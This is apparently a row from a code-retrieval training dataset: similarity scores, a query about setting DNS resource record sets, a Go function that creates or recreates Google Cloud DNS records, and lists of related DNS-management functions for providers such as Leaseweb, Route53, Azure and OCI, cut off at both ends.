%v\", tests.Failed, err)\n\t\t\t}\n\t\t\tt.Logf(\"\\t%s\\tShould be able to retrieve the query sets\", tests.Success)\n\n\t\t\tvar count int\n\t\t\tfor _, set := range sets {\n\t\t\t\tif len(set.Name) > len(prefix) && set.Name[0:len(prefix)] == prefix {\n\t\t\t\t\tcount++\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif count != 2 {\n\t\t\t\tt.Fatalf(\"\\t%s\\tShould have two query sets : %d\", tests.Failed, count)\n\t\t\t}\n\t\t\tt.Logf(\"\\t%s\\tShould have two query sets.\", tests.Success)\n\t\t}\n\t}\n}", "func (p *Provider) GetRecords(ctx context.Context, zone string) ([]libdns.Record, error) {\n\treturn nil, fmt.Errorf(\"not implemented\")\n}", "func (c *Client) GetDNSRecordsByName(ctx context.Context, crnstr string, zoneID string, recordName string) ([]dnsrecordsv1.DnsrecordDetails, error) {\n\tauthenticator := &core.IamAuthenticator{\n\t\tApiKey: c.APIKey,\n\t}\n\n\t// Set CIS DNS record service\n\tdnsService, err := dnsrecordsv1.NewDnsRecordsV1(&dnsrecordsv1.DnsRecordsV1Options{\n\t\tAuthenticator: authenticator,\n\t\tCrn: core.StringPtr(crnstr),\n\t\tZoneIdentifier: core.StringPtr(zoneID),\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Get CIS DNS records by name\n\trecords, _, err := dnsService.ListAllDnsRecordsWithContext(ctx, &dnsrecordsv1.ListAllDnsRecordsOptions{\n\t\tName: core.StringPtr(recordName),\n\t})\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"could not retrieve DNS records\")\n\t}\n\n\treturn records.Result, nil\n}", "func GetRecords(kc kinesisiface.KinesisAPI, name string) []*kinesis.Record {\n\tvar recordList []*kinesis.Record\n\n\tshards, err := kc.ListShards(&kinesis.ListShardsInput{\n\t\tStreamName: &name,\n\t})\n\tif err != nil {\n\t\tframework.FailfWithOffset(2, \"Failed to get shards from stream: %s\", err)\n\t}\n\n\tfor _, s := range shards.Shards {\n\t\tshardIterator, err := kc.GetShardIterator(&kinesis.GetShardIteratorInput{\n\t\t\tShardId: s.ShardId,\n\t\t\tShardIteratorType: aws.String(\"TRIM_HORIZON\"),\n\t\t\tStreamName: &name,\n\t\t})\n\t\tif err != nil {\n\t\t\tframework.FailfWithOffset(2, \"Failed to get shard iterator from stream: %s\", err)\n\t\t}\n\n\t\trecords, err := kc.GetRecords(&kinesis.GetRecordsInput{\n\t\t\tShardIterator: shardIterator.ShardIterator,\n\t\t})\n\t\tif err != nil {\n\t\t\tframework.FailfWithOffset(2, \"Failed to get records from stream: %s\", err)\n\t\t}\n\t\trecordList = append(recordList, records.Records...)\n\t}\n\n\treturn recordList\n}", "func (client DnsClient) deleteRRSet(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodDelete, \"/zones/{zoneNameOrId}/records/{domain}/{rtype}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response DeleteRRSetResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}" ]
[ "0.6996784", "0.69788545", "0.69788545", "0.6760038", "0.6608798", "0.6574195", "0.62507427", "0.6177412", "0.61474234", "0.6131648", "0.5973977", "0.5969924", "0.5915531", "0.58928186", "0.5730913", "0.569206", "0.56689787", "0.55815643", "0.553899", "0.55002767", "0.5467366", "0.5451813", "0.54359937", "0.54315376", "0.5429646", "0.5396242", "0.53900224", "0.5329584", "0.532605", "0.52741", "0.5242113", "0.52352595", "0.5200467", "0.5199565", "0.51992065", "0.5198168", "0.51803666", "0.5164825", "0.515773", "0.5157608", "0.51428473", "0.51387066", "0.5079134", "0.49818212", "0.49691308", "0.49568778", "0.49238542", "0.4923452", "0.49160513", "0.491525", "0.4887644", "0.48811156", "0.48702934", "0.48696047", "0.48530257", "0.4852501", "0.48443222", "0.48437774", "0.4843589", "0.48300865", "0.48250246", "0.48097047", "0.48058966", "0.4805364", "0.4791435", "0.47879815", "0.47767857", "0.47736725", "0.47511134", "0.47406727", "0.47343114", "0.4729323", "0.47238088", "0.4713055", "0.4711133", "0.46894982", "0.46812344", "0.46805355", "0.46752968", "0.46663103", "0.4649927", "0.46339765", "0.46278042", "0.46258253", "0.46186167", "0.46105108", "0.46034458", "0.4599793", "0.4599043", "0.4592502", "0.4587955", "0.45770591", "0.45759758", "0.45726576", "0.45721427", "0.4568773", "0.4566466", "0.45655796", "0.4552975", "0.45483232" ]
0.70044184
0
SetResourceRecordSets will create or update a DNS zone with one or more record sets
func (d *DNS) SetResourceRecordSets(projectID string, managedZone string, records []*v1.ResourceRecordSet) error { var deletions []*v1.ResourceRecordSet var additions []*v1.ResourceRecordSet var change *v1.Change logItems := []string{} for _, record := range records { existing, err := d.GetResourceRecordSet(projectID, managedZone, record.Name) if err != nil { return fmt.Errorf("Error trying to get existing resource record set: %s", err) } action := "creating" if existing != nil { deletions = append(deletions, existing) action = "recreating" } logItems = append(logItems, fmt.Sprintf("====> %s %s => %s %s", action, record.Name, record.Type, strings.Join(record.Rrdatas, ","))) additions = append(additions, record) } d.log.Info("Ensuring the DNS zone %s has the following records:", managedZone) for _, item := range logItems { d.log.ListItem(item) } if len(deletions) > 0 { change = &v1.Change{ Deletions: deletions, } if err := d.executeChange(projectID, managedZone, change); err != nil { return err } } change = &v1.Change{ Additions: additions, } if err := d.executeChange(projectID, managedZone, change); err != nil { return err } return nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (p *Provider) SetRecords(ctx context.Context, zone string, records []libdns.Record) ([]libdns.Record, error) {\n\tp.mutex.Lock()\n\tdefer p.mutex.Unlock()\n\n\tclient := &http.Client{}\n\n\tvar updatedRecords []libdns.Record\n\n\tvar resourceRecordSets []LeasewebRecordSet\n\n\tfor _, record := range records {\n\n\t\trecordSet := LeasewebRecordSet{\n\t\t\tName: record.Name,\n\t\t\tType: record.Type,\n\t\t\tContent: []string{record.Value},\n\t\t\tTTL: int(record.TTL.Seconds()),\n\t\t}\n\n\t\tresourceRecordSets = append(resourceRecordSets, recordSet)\n\n\t\tupdatedRecords = append(updatedRecords, record)\n\t}\n\n\tbody := &LeasewebRecordSets{\n\t\tResourceRecordSets: resourceRecordSets,\n\t}\n\n\tbodyBuffer := new(bytes.Buffer)\n\tjson.NewEncoder(bodyBuffer).Encode(body)\n\n\treq, err := http.NewRequest(http.MethodPut, fmt.Sprintf(\"https://api.leaseweb.com/hosting/v2/domains/%s/resourceRecordSets\", zone), bodyBuffer)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq.Header.Add(LeasewebApiKeyHeader, p.APIKey)\n\n\tres, err := client.Do(req)\n\tdefer res.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif res.StatusCode < 200 || res.StatusCode > 299 {\n\t\treturn nil, fmt.Errorf(\"Received StatusCode %d from Leaseweb API\", res.StatusCode)\n\t}\n\n\treturn updatedRecords, nil\n}", "func (p *Provider) SetRecords(ctx context.Context, zone string, records []libdns.Record) ([]libdns.Record, error) {\n\treturn p.updateRecords(ctx, zone, records)\n}", "func (d *DNSController) ensureDNSRrsets(dnsZone dnsprovider.Zone, dnsName string, endpoints []string, uplevelCname string) error {\n\trrsets, supported := dnsZone.ResourceRecordSets()\n\tif !supported {\n\t\treturn fmt.Errorf(\"Failed to ensure DNS records for %s. DNS provider does not support the ResourceRecordSets interface\", dnsName)\n\t}\n\trrsetList, err := rrsets.Get(dnsName)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif len(rrsetList) == 0 {\n\t\tglog.V(4).Infof(\"No recordsets found for DNS name %q. Need to add either A records (if we have healthy endpoints), or a CNAME record to %q\", dnsName, uplevelCname)\n\t\tif len(endpoints) < 1 {\n\t\t\tglog.V(4).Infof(\"There are no healthy endpoint addresses at level %q, so CNAME to %q, if provided\", dnsName, uplevelCname)\n\t\t\tif uplevelCname != \"\" {\n\t\t\t\tglog.V(4).Infof(\"Creating CNAME to %q for %q\", uplevelCname, dnsName)\n\t\t\t\tnewRrset := rrsets.New(dnsName, []string{uplevelCname}, minDNSTTL, rrstype.CNAME)\n\t\t\t\tglog.V(4).Infof(\"Adding recordset %v\", newRrset)\n\t\t\t\terr = rrsets.StartChangeset().Add(newRrset).Apply()\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tglog.V(4).Infof(\"Successfully created CNAME to %q for %q\", uplevelCname, dnsName)\n\t\t\t} else {\n\t\t\t\tglog.V(4).Infof(\"We want no record for %q, and we have no record, so we're all good.\", dnsName)\n\t\t\t}\n\t\t} else {\n\t\t\t// We have valid endpoint addresses, so just add them as A records.\n\t\t\t// But first resolve DNS names, as some cloud providers (like AWS) expose\n\t\t\t// load balancers behind DNS names, not IP addresses.\n\t\t\tglog.V(4).Infof(\"We have valid endpoint addresses %v at level %q, so add them as A records, after resolving DNS names\", endpoints, dnsName)\n\t\t\t// Resolve DNS through network\n\t\t\tresolvedEndpoints, err := getResolvedEndpoints(endpoints, d.netWrapper)\n\t\t\tif err != nil {\n\t\t\t\treturn err // TODO: We could potentially add the ones we did get back, even if some of them failed to resolve.\n\t\t\t}\n\n\t\t\tnewRrset := rrsets.New(dnsName, resolvedEndpoints, minDNSTTL, rrstype.A)\n\t\t\tglog.V(4).Infof(\"Adding recordset %v\", newRrset)\n\t\t\terr = rrsets.StartChangeset().Add(newRrset).Apply()\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tglog.V(4).Infof(\"Successfully added recordset %v\", newRrset)\n\t\t}\n\t} else {\n\t\t// the rrsets already exists, so make it right.\n\t\tglog.V(4).Infof(\"Recordset %v already exists. Ensuring that it is correct.\", rrsetList)\n\t\tif len(endpoints) < 1 {\n\t\t\t// Need an appropriate CNAME record. Check that we have it.\n\t\t\tnewRrset := rrsets.New(dnsName, []string{uplevelCname}, minDNSTTL, rrstype.CNAME)\n\t\t\tglog.V(4).Infof(\"No healthy endpoints for %d. Have recordsets %v. Need recordset %v\", dnsName, rrsetList, newRrset)\n\t\t\tfound := findRrset(rrsetList, newRrset)\n\t\t\tif found != nil {\n\t\t\t\t// The existing rrset is equivalent to the required one - our work is done here\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v is equivalent to needed recordset %v, our work is done here.\", rrsetList, newRrset)\n\t\t\t\treturn nil\n\t\t\t} else {\n\t\t\t\t// Need to replace the existing one with a better one (or just remove it if we have no healthy endpoints).\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v not equivalent to needed recordset %v removing existing and adding needed.\", rrsetList, newRrset)\n\t\t\t\tchangeSet := rrsets.StartChangeset()\n\t\t\t\tfor i := range rrsetList {\n\t\t\t\t\tchangeSet = changeSet.Remove(rrsetList[i])\n\t\t\t\t}\n\t\t\t\tif uplevelCname != \"\" {\n\t\t\t\t\tchangeSet = changeSet.Add(newRrset)\n\t\t\t\t\tif err := changeSet.Apply(); err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\tglog.V(4).Infof(\"Successfully replaced needed recordset %v -> %v\", found, newRrset)\n\t\t\t\t} else {\n\t\t\t\t\tif err := changeSet.Apply(); err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\tglog.V(4).Infof(\"Successfully removed existing recordset %v\", found)\n\t\t\t\t\tglog.V(4).Infof(\"Uplevel CNAME is empty string. Not adding recordset %v\", newRrset)\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\t// We have an rrset in DNS, possibly with some missing addresses and some unwanted addresses.\n\t\t\t// And we have healthy endpoints. Just replace what'd there with the healthy endpoints, if it'd not already correct.\n\t\t\tglog.V(4).Infof(\"%d: Healthy endpoints %v exist. Recordset %v exists. Reconciling.\", dnsName, endpoints, rrsetList)\n\t\t\tresolvedEndpoints, err := getResolvedEndpoints(endpoints, d.netWrapper)\n\t\t\tif err != nil { // Some invalid addresses or otherwise unresolvable DNS names.\n\t\t\t\treturn err // TODO: We could potentially add the ones we did get back, even if some of them failed to resolve.\n\t\t\t}\n\t\t\tnewRrset := rrsets.New(dnsName, resolvedEndpoints, minDNSTTL, rrstype.A)\n\t\t\tglog.V(4).Infof(\"Have recordset %v. Need recordset %v\", rrsetList, newRrset)\n\t\t\tfound := findRrset(rrsetList, newRrset)\n\t\t\tif found != nil {\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v is equivalent to needed recordset %v, our work is done here.\", found, newRrset)\n\t\t\t\t// TODO: We could be more thorough about checking for equivalence to avoid unnecessary updates, but in the\n\t\t\t\t// worst case we'll just replace what'd there with an equivalent, if not exactly identical record set.\n\t\t\t\treturn nil\n\t\t\t} else {\n\t\t\t\t// Need to replace the existing one with a better one\n\t\t\t\tglog.V(4).Infof(\"Existing recordset %v is not equivalent to needed recordset %v, removing existing and adding needed.\", found, newRrset)\n\t\t\t\tchangeSet := rrsets.StartChangeset()\n\t\t\t\tfor i := range rrsetList {\n\t\t\t\t\tchangeSet = changeSet.Remove(rrsetList[i])\n\t\t\t\t}\n\t\t\t\tchangeSet = changeSet.Add(newRrset)\n\t\t\t\tif err = changeSet.Apply(); err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t\tglog.V(4).Infof(\"Successfully replaced recordset %v -> %v\", found, newRrset)\n\t\t\t}\n\t\t}\n\t}\n\treturn nil\n}", "func (s *cloudDNSService) getResourceRecordSets(dnsZone string) ([]*dns.ResourceRecordSet, error) {\n\ttimer := pkg.NewTimer(prometheus.ObserverFunc(func(v float64) {\n\t\trequestRecordsTimeSummary.WithLabelValues(dnsZone).Observe(v)\n\t}))\n\tdefer timer.ObserveDuration()\n\n\tpageToken := \"\"\n\n\tresourceRecordSets := make([]*dns.ResourceRecordSet, 0, 16)\n\tfor {\n\t\treq := s.service.ResourceRecordSets.List(s.project, dnsZone)\n\t\tif pageToken != \"\" {\n\t\t\treq.PageToken(pageToken)\n\t\t}\n\t\tresp, err := req.Do()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"[Cloud DNS] Error getting DNS resourceRecordSets from zone %s: %v\", dnsZone, err)\n\t\t}\n\t\tfor _, r := range resp.Rrsets {\n\t\t\tresourceRecordSets = append(resourceRecordSets, r)\n\t\t}\n\t\tif resp.NextPageToken == \"\" {\n\t\t\tbreak\n\t\t}\n\t\tpageToken = resp.NextPageToken\n\t}\n\treturn resourceRecordSets, nil\n}", "func (c *DeviceController) UpdateRecordSet(w http.ResponseWriter, r *http.Request) {\n\tvar rs r53.RecordSet\n\tif r.Body == nil {\n\t\thttp.Error(w, \"Please send a request body\", 400)\n\t\treturn\n\t}\n\terr := json.NewDecoder(r.Body).Decode(&rs)\n\tif err != nil {\n\t\thttp.Error(w, err.Error(), 400)\n\t\treturn\n\t}\n\tprintln(rs.HostedZoneId)\n\tres := r53.UpdateRecordSet(rs)\n\tc.SendJSON(\n\t\tw,\n\t\tr,\n\t\tres,\n\t\thttp.StatusOK,\n\t)\n}", "func createResourceRecordSetChange(svc *route53.Route53, zone string, changes []*route53.Change) error {\n\tparams := &route53.ChangeResourceRecordSetsInput{\n\t\tChangeBatch: &route53.ChangeBatch{ // Required\n\t\t\tChanges: changes,\n\t\t\tComment: aws.String(\"Zone Changes\"),\n\t\t},\n\t\tHostedZoneId: aws.String(zone), // Required\n\t}\n\tresp, err := svc.ChangeResourceRecordSets(params)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Pretty-print the response data.\n\tfmt.Println(\"Changes Submitted to AWS:\")\n\tfmt.Printf(\"Comment: %s \\n\", aws.StringValue(resp.ChangeInfo.Comment))\n\tfmt.Printf(\"ID: %s \\n\", aws.StringValue(resp.ChangeInfo.Id))\n\tfmt.Printf(\"Status: %s \\n\", aws.StringValue(resp.ChangeInfo.Status))\n\tfmt.Printf(\"Submitted At: %s \\n\", aws.TimeValue(resp.ChangeInfo.SubmittedAt))\n\treturn nil\n}", "func (d *DNS) DeleteResourceRecordSets(projectID string, managedZone string) error {\n\tvar deletions []*v1.ResourceRecordSet\n\tresourceRecordSets, err := d.GetResourceRecordSets(projectID, managedZone)\n\tif err != nil {\n\t\treturn err\n\t}\n\td.log.Info(\"Deleting all records from DNS zone %s:\", managedZone)\n\tfor _, resourceRecordSet := range resourceRecordSets {\n\t\tif resourceRecordSet.Type == \"SOA\" || resourceRecordSet.Type == \"NS\" {\n\t\t\tcontinue\n\t\t}\n\t\tdeletions = append(deletions, resourceRecordSet)\n\t\td.log.ListItem(\"%s %s\", resourceRecordSet.Type, resourceRecordSet.Name)\n\t}\n\tchange := &v1.Change{\n\t\tDeletions: deletions,\n\t}\n\tif err := d.executeChange(projectID, managedZone, change); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (ac *azureClient) CreateOrUpdateRecordSet(ctx context.Context, resourceGroupName string, privateZoneName string, recordType privatedns.RecordType, name string, set privatedns.RecordSet) error {\n\tctx, _, done := tele.StartSpanWithLogger(ctx, \"privatedns.AzureClient.CreateOrUpdateRecordSet\")\n\tdefer done()\n\n\t_, err := ac.recordsets.CreateOrUpdate(ctx, resourceGroupName, privateZoneName, recordType, name, set, \"\", \"\")\n\treturn err\n}", "func (r *Records) SetRecords() error {\n\turl := fmt.Sprintf(\"%s/v1/domains/%s/records/%s/%s\", r.Config.GetAPI(), r.Domain, r.Records[0].Type, r.Records[0].Name)\n\tclient := &http.Client{}\n\n\tdata, err := json.Marshal(r.Records)\n\treq, _ := http.NewRequest(\"PUT\", url, bytes.NewBuffer(data))\n\treq.Header.Set(r.Config.GetAuth())\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\n\tres, err := client.Do(req)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif res.StatusCode != 200 {\n\t\treturn errors.New(string(res.StatusCode))\n\t}\n\n\treturn nil\n}", "func (p *Provider) AppendRecords(ctx context.Context, zone string, records []libdns.Record) ([]libdns.Record, error) {\n\tp.mutex.Lock()\n\tdefer p.mutex.Unlock()\n\n\tclient := &http.Client{}\n\n\tvar addedRecords []libdns.Record\n\n\tfor _, record := range records {\n\t\tbody := &LeasewebRecordSet{\n\t\t\tName: record.Name,\n\t\t\tType: record.Type,\n\t\t\tContent: []string{record.Value},\n\t\t\tTTL: int(record.TTL.Seconds()),\n\t\t}\n\n\t\tbodyBuffer := new(bytes.Buffer)\n\t\tjson.NewEncoder(bodyBuffer).Encode(body)\n\n\t\treq, err := http.NewRequest(http.MethodPost, fmt.Sprintf(\"https://api.leaseweb.com/hosting/v2/domains/%s/resourceRecordSets\", zone), bodyBuffer)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treq.Header.Add(LeasewebApiKeyHeader, p.APIKey)\n\n\t\tres, err := client.Do(req)\n\t\tdefer res.Body.Close()\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif res.StatusCode < 200 || res.StatusCode > 299 {\n\t\t\treturn nil, fmt.Errorf(\"Received StatusCode %d from Leaseweb API\", res.StatusCode)\n\t\t}\n\n\t\taddedRecords = append(addedRecords, record)\n\t}\n\n\treturn addedRecords, nil\n}", "func (client DnsClient) updateRRSet(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodPut, \"/zones/{zoneNameOrId}/records/{domain}/{rtype}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response UpdateRRSetResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func NewResourceRecordSet(ctx *pulumi.Context,\n\tname string, args *ResourceRecordSetArgs, opts ...pulumi.ResourceOption) (*ResourceRecordSet, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.ManagedZone == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'ManagedZone'\")\n\t}\n\treplaceOnChanges := pulumi.ReplaceOnChanges([]string{\n\t\t\"managedZone\",\n\t\t\"project\",\n\t})\n\topts = append(opts, replaceOnChanges)\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource ResourceRecordSet\n\terr := ctx.RegisterResource(\"google-native:dns/v1beta2:ResourceRecordSet\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (_Contract *ContractTransactor) SetDNSRecords(opts *bind.TransactOpts, node [32]byte, data []byte) (*types.Transaction, error) {\n\treturn _Contract.contract.Transact(opts, \"setDNSRecords\", node, data)\n}", "func (s *ResourceRecordSetServer) applyResourceRecordSet(ctx context.Context, c *dns.Client, request *dnspb.ApplyDnsResourceRecordSetRequest) (*dnspb.DnsResourceRecordSet, error) {\n\tp := ProtoToResourceRecordSet(request.GetResource())\n\tres, err := c.ApplyResourceRecordSet(ctx, p)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tr := ResourceRecordSetToProto(res)\n\treturn r, nil\n}", "func NewRecordSet(ctx *pulumi.Context,\n\tname string, args *RecordSetArgs, opts ...pulumi.ResourceOption) (*RecordSet, error) {\n\tif args == nil || args.ManagedZone == nil {\n\t\treturn nil, errors.New(\"missing required argument 'ManagedZone'\")\n\t}\n\tif args == nil || args.Rrdatas == nil {\n\t\treturn nil, errors.New(\"missing required argument 'Rrdatas'\")\n\t}\n\tif args == nil || args.Ttl == nil {\n\t\treturn nil, errors.New(\"missing required argument 'Ttl'\")\n\t}\n\tif args == nil || args.Type == nil {\n\t\treturn nil, errors.New(\"missing required argument 'Type'\")\n\t}\n\tif args == nil {\n\t\targs = &RecordSetArgs{}\n\t}\n\tvar resource RecordSet\n\terr := ctx.RegisterResource(\"gcp:dns/recordSet:RecordSet\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (p *AWSProvider) Records(zone string) ([]*endpoint.Endpoint, error) {\n\tendpoints := []*endpoint.Endpoint{}\n\n\tf := func(resp *route53.ListResourceRecordSetsOutput, lastPage bool) (shouldContinue bool) {\n\t\tfor _, r := range resp.ResourceRecordSets {\n\t\t\t// TODO(linki, ownership): Remove once ownership system is in place.\n\t\t\t// See: https://github.com/kubernetes-incubator/external-dns/pull/122/files/74e2c3d3e237411e619aefc5aab694742001cdec#r109863370\n\t\t\tswitch aws.StringValue(r.Type) {\n\t\t\tcase route53.RRTypeA, route53.RRTypeCname, route53.RRTypeTxt:\n\t\t\t\tbreak\n\t\t\tdefault:\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tfor _, rr := range r.ResourceRecords {\n\t\t\t\tendpoints = append(endpoints, endpoint.NewEndpoint(aws.StringValue(r.Name), aws.StringValue(rr.Value), aws.StringValue(r.Type)))\n\t\t\t}\n\n\t\t\tif r.AliasTarget != nil {\n\t\t\t\tendpoints = append(endpoints, endpoint.NewEndpoint(aws.StringValue(r.Name), aws.StringValue(r.AliasTarget.DNSName), \"ALIAS\"))\n\t\t\t}\n\t\t}\n\n\t\treturn true\n\t}\n\n\tparams := &route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: aws.String(expandedHostedZoneID(zone)),\n\t}\n\n\tif err := p.Client.ListResourceRecordSetsPages(params, f); err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn endpoints, nil\n}", "func (client DnsClient) updateZoneRecords(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodPut, \"/zones/{zoneNameOrId}/records\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response UpdateZoneRecordsResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func NewRecordSet(ctx *pulumi.Context,\n\tname string, args *RecordSetArgs, opts ...pulumi.ResourceOption) (*RecordSet, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.ManagedZone == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'ManagedZone'\")\n\t}\n\tif args.Name == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'Name'\")\n\t}\n\tif args.Type == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'Type'\")\n\t}\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource RecordSet\n\terr := ctx.RegisterResource(\"gcp:dns/recordSet:RecordSet\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewRecordSet(v dns.RecordSet) (*RecordSet, error) {\n\tr := RecordSet{}\n\tr.Name = *v.Name\n\tr.Type = strings.Replace(*v.Type, \"Microsoft.Network/dnszones/\", \"\", -1)\n\tr.Mark = \"\"\n\tr.Properties.TTL = int(*(*v.RecordSetProperties).TTL)\n\n\t// r.Properties.Values is empty, need to be initialized.\n\t// I prefer doing so in each switch/case sentence.\n\tswitch r.Type {\n\tcase \"A\":\n\t\tfor _, v := range *v.RecordSetProperties.ARecords {\n\t\t\tr.Properties.Values = append(r.Properties.Values, *v.Ipv4Address)\n\t\t}\n\tcase \"AAAA\":\n\t\tfor _, v := range *v.RecordSetProperties.AaaaRecords {\n\t\t\tr.Properties.Values = append(r.Properties.Values, *v.Ipv6Address)\n\t\t}\n\tcase \"CNAME\":\n\t\tr.Properties.Values = append(r.Properties.Values, *v.RecordSetProperties.CnameRecord.Cname)\n\tcase \"MX\":\n\t\tfor _, v := range *v.RecordSetProperties.MxRecords {\n\t\t\tpref := strconv.FormatInt(int64(*v.Preference), 10)\n\t\t\tr.Properties.Values = append(r.Properties.Values, pref+\" \"+*v.Exchange)\n\t\t}\n\tcase \"NS\":\n\t\tfor _, v := range *v.RecordSetProperties.NsRecords {\n\t\t\t// Append to the golbal variable\n\t\t\tnsrecords = append(nsrecords, *v.Nsdname)\n\t\t}\n\tcase \"TXT\":\n\t\tfor _, v := range *v.RecordSetProperties.TxtRecords {\n\t\t\t// Concat values into one string\n\t\t\ts := \"\"\n\t\t\tfor _, w := range *v.Value {\n\t\t\t\ts += w\n\t\t\t}\n\t\t\tr.Properties.Values = append(r.Properties.Values, s)\n\t\t}\n\tcase \"CAA\":\n\t\tcps := []CaaProperty{}\n\t\tfor _, v := range *v.RecordSetProperties.CaaRecords {\n\t\t\tcp := CaaProperty{\n\t\t\t\tFlags: v.Flags,\n\t\t\t\tTag: *v.Tag,\n\t\t\t\tValue: *v.Value,\n\t\t\t}\n\t\t\tcps = append(cps, cp)\n\t\t}\n\n\t\tr.Properties.CaaProperties = cps\n\tdefault:\n\t\treturn nil, nil\n\t}\n\n\treturn &r, nil\n}", "func (p *Provider) GetRecords(ctx context.Context, zone string) ([]libdns.Record, error) {\n\tp.mutex.Lock()\n\tdefer p.mutex.Unlock()\n\n\tclient := &http.Client{}\n\n\treq, err := http.NewRequest(http.MethodGet, fmt.Sprintf(\"https://api.leaseweb.com/hosting/v2/domains/%s/resourceRecordSets\", zone), nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq.Header.Add(LeasewebApiKeyHeader, p.APIKey)\n\n\tres, err := client.Do(req)\n\tdefer res.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif res.StatusCode < 200 || res.StatusCode > 299 {\n\t\treturn nil, fmt.Errorf(\"Received StatusCode %d from Leaseweb API\", res.StatusCode)\n\t}\n\n\tdata, err := ioutil.ReadAll(res.Body)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar recordSets LeasewebRecordSets\n\tjson.Unmarshal([]byte(data), &recordSets)\n\n\tvar records []libdns.Record\n\n\tfor _, resourceRecordSet := range recordSets.ResourceRecordSets {\n\t\tfor _, content := range resourceRecordSet.Content {\n\t\t\trecord := libdns.Record{\n\t\t\t\tName: resourceRecordSet.Name,\n\t\t\t\tValue: content,\n\t\t\t\tType: resourceRecordSet.Type,\n\t\t\t\tTTL: time.Duration(resourceRecordSet.TTL) * time.Second,\n\t\t\t}\n\t\t\trecords = append(records, record)\n\t\t}\n\t}\n\n\treturn records, nil\n}", "func (s *dnsRecordSetLister) DnsRecordSets(namespace string) DnsRecordSetNamespaceLister {\n\treturn dnsRecordSetNamespaceLister{indexer: s.indexer, namespace: namespace}\n}", "func setResource(alloc types.ResourceList, res map[string]int64, grpres map[string]int64) {\n\t// set resource\n\tfor key, val := range res {\n\t\tsetRes(alloc, key, val)\n\t}\n\t// set group resource\n\tfor key, val := range grpres {\n\t\tsetGrpRes(alloc, key, val)\n\t}\n}", "func listAllRecordSets(r53 *route53.Route53, id string) (rrsets []*route53.ResourceRecordSet, err error) {\n\treq := route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: &id,\n\t}\n\n\tfor {\n\t\tvar resp *route53.ListResourceRecordSetsOutput\n\t\tresp, err = r53.ListResourceRecordSets(&req)\n\t\tif err != nil {\n\t\t\treturn\n\t\t}\n\t\trrsets = append(rrsets, 